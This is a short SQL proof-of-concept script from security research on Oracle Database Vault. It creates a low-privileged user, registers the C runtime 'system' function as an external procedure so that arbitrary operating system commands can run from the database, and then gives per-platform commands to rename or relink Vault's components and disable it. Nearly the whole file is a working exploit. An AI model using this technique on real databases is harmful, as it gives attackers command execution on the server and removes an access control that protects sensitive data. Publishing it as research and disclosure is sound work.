/*
  Hacking and Protecting Oracle Database Vault
  By Esteban Martinez Fayo
  esteban>at<argeniss.com

  Proof of concept to demonstrate how it is possible for a user
  having CREATE PROCEDURE and CREATE LIBRARY privileges to
  execute Operating System commands and disable Oracle Database Vault
  using external procedure calls.
*/


connect macacct/macacct_password

create user test identified by test;

connect / as sysdba

grant create session, create procedure, create library to test;

connect test/test


CREATE LIBRARY OS_EXEC AS '${ORACLE_HOME}\bin\msvcr71.dll';
/

CREATE OR REPLACE PROCEDURE OS_EXEC2 (OS_CMD IN VARCHAR2) IS
 EXTERNAL NAME "system" LANGUAGE C LIBRARY OS_EXEC PARAMETERS (OS_CMD STRING);
/


--
-- Now we can execute OS commands.
--
-- To disable Oracle Database Vault we must execute different commands
-- depending on Oracle platform and release.
-- Uncomment the appropiate one.

-- Windows
-- 11g
--EXEC OS_EXEC2 ('ren %ORACLE_HOME%\bin\oradv11.dll oradv11_.dll');
-- 10g
--EXEC OS_EXEC2 ('ren %ORACLE_HOME%\bin\oradv10.dll oradv10_.dll');

-- Linux
--BEGIN
--  OS_EXEC2 ('make -f $ORACLE_HOME/rdbms/lib/ins_rdbms.mk dv_off');
--  OS_EXEC2 ('$ORACLE_HOME/bin/relink oracle');
--END;


connect macacct/macacct_password

drop user test cascade;


-- Now Restart Oracle Database service and Oracle Database Vault will be disabled.
